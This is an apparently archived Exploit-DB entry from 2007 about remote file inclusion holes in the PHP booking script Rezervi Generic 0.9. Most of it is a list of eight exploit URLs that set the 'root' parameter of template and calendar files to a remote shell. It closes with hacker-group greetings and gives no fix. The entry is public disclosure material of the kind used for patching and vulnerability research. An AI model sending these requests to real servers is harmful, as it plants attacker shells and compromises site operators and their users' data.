Rezervi 0.9 - 'root' Remote File Inclusion

EDB-ID:

3763


Author:

GoLd_M

Type:

webapps


Platform:

PHP

Date:

2007-04-18


# Rezervi Generic 0.9(root)Remote File Include Vulnerablities
# D.Script: http://www.rezervi.com/www/german/download/rezerviGenericV0_9.zip
# Discovered by: GolD_M = [Mahmood_ali]
# Homepage: http://www.Tryag.cc
# Exploit:[Path]/templates/datumVonDatumBis.inc.php?root=Shell
# Exploit:[Path]/templates/footer.inc.php?root=Shell
# Exploit:[Path]/templates/header.inc.php?root=Shell
# Exploit:[Path]/templates/stylesheets.php?root=Shell
# Exploit:[Path]/belegungsplan/wochenuebersicht.inc.php?root=Shell
# Exploit:[Path]/belegungsplan/monatsuebersicht.inc.php?root=Shell
# Exploit:[Path]/belegungsplan/jahresuebersicht.inc.php?root=Shell
# Exploit:[Path]/belegungsplan/tagesuebersicht.inc.php?root=Shell
# Greetz To: Tryag-Team & 4lKaSrGoLd3n-Team & AsbMay's Group
# Thanx To : RootShell-Team.Info & Alkomandoz Hacker 

# milw0rm.com [2007-04-18]